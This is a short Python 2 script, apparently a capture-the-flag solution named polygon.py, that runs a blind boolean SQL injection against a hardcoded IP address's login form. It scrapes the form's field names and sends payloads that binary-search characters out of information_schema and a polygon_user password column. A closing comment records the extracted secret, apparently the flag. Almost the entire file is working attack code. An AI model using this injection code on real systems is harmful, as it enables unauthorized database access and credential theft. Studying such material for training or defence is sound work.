polygon.py

import requests
import string
import sys

url = "http://54.204.80.192"


def get_bit(payload):
    "Returns a bit based on blind injection"

    resp = requests.get(url + "/example")
    form = resp.text.encode('utf-8')
    action = form.split("<form action=\"")[1].split("\"")[0]
    user = form.split("Username")[1].split("Password")[0].split("name=\"")[1].split("\"")[0]
    passwd = form.split("Password")[1].split("primary")[0].split("name=\"")[1].split("\"")[0]

    cookie = resp.headers['set-cookie']

    resp = requests.post(url + action, data={user: payload, passwd: "test"}, headers={'Cookie': cookie})
    res = resp.text.encode('utf-8')

    return "Hello" in res

def get_char(fmt, char_id):
    "Returns a character using binary search"
    low, high = 0, 127
    pivot = (low + high) / 2
    le_op = "<="
    eq_op = "="

    while True:

        if abs(low-high) <= 1:
            if get_bit(fmt % (low, eq_op, char_id)):
                return chr(low)
            return chr(high)

        payload = fmt % (pivot, le_op, char_id)
        if get_bit(payload):
            low = pivot
        else:
            high = pivot
        pivot = (low + high)/2

def get_string(fmt):
    "Returns a string character by character"

    res = ''
    ch = 'x'
    i = 1
    while True:
        ch = get_char(fmt, i)
        res += ch
        i += 1

        print '%r' % res
    return res

def main():
    # get_string("test' and %d%s(select ord(substr(table_name,%d,1)) from information_schema.tables limit 40,1)#")
    # get_string("test' and %d%s(select ord(substr(column_name,%d,1)) from information_schema.columns where table_name='polygon_user' limit 2,1)#")
    get_string("test' and %d%s(select ord(substr(password,%d,1)) from polygon_user limit 1,1)#")

if __name__ == '__main__':
    main()

"""
    polygon_user -- password

    n0b0t5_C4n_bYpa5s_p0lYm0rph1Sm
"""